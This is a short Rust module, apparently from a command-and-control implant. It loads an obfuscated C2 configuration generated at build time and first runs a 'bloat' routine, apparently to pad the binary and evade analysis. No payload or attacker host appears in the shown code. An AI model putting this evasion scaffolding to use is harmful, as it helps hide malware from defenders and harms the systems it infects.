use crate::common::C2Config;
use serde_json;

// Include generated artifacts from build.rs
include!(concat!(env!("OUT_DIR"), "/obfuscated_config.rs"));
include!(concat!(env!("OUT_DIR"), "/bloat_data.rs"));

pub fn load() -> C2Config {
    // 1. Run Bloat (if enabled)
    use_bloat();

    // 2. Decode Config
    // get_config() is generated by build.rs
    let config_json = get_config();
    let config: C2Config = serde_json::from_str(&config_json)
        .expect("[-] Config parse failed");
    
    config
}
